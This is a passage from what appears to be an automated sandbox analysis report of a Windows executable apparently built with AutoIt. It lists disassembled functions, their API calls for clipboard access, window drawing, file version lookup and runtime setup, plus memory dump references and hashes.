                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                                                                                                                • String ID: ($,$tooltips_class32
                                                                                                                                                                                                                • API String ID: 225202481-3320066284
                                                                                                                                                                                                                • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                                                                                                • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                                                                                                                                Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                                                                                                                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                                                                                                                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 15083398-0
                                                                                                                                                                                                                • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                                                                                                • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                                                                                                                                                Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                                                                                                                                                • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                                                                                                                                                • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                                                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                                                                                                                                • String ID: @$AutoIt v3 GUI
                                                                                                                                                                                                                • API String ID: 867697134-3359773793
                                                                                                                                                                                                                • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                                                                                                                                • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                                                                                                                                                                Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                                                                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                • API String ID: 1503153545-1459072770
                                                                                                                                                                                                                • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                                                                                                                                                                                • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                                                                                                                                                                Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __wcsicoll$__wcsnicmp
                                                                                                                                                                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                                                                                                                                                                • API String ID: 790654849-32604322
                                                                                                                                                                                                                • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                                                                                                                                • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                                                                                                                                                                Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                                                                                                                                                                • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                                                                                                                                                                Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                                                                                                                                                                • _fseek.LIBCMT ref: 00452B3B
                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00452B9B
                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 00452BB0
                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00452BC5
                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00452BEF
                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00452C07
                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00452C1C
                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452C53
                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452C64
                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452C83
                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452C94
                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452CB5
                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452CC6
                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452CD7
                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452CE8
                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                                                                                                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                                                                                                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452D78
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2054058615-0
                                                                                                                                                                                                                • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                                                                                                                                                • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                                                                                                                                                                Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window
                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                • API String ID: 2353593579-4108050209
                                                                                                                                                                                                                • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                                                                                                                • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                                                                                                                                                Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                                                                                                                                                • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                                                                                                                                                • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                                                                                                                                                • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                                                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                                                                                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                                                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                                                                                                                                                • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                                                                                                                                                • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1744303182-0
                                                                                                                                                                                                                • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                                                                                                                • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                                                                                                                                                Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                                                                                                                                                • __mtterm.LIBCMT ref: 00417C34
                                                                                                                                                                                                                  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                                                                                                                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                                                                                                                                  • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                                                                                                                                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                                                                                                                                                • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                                                                                                                                                • __init_pointers.LIBCMT ref: 00417CE6
                                                                                                                                                                                                                • __calloc_crt.LIBCMT ref: 00417D54
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
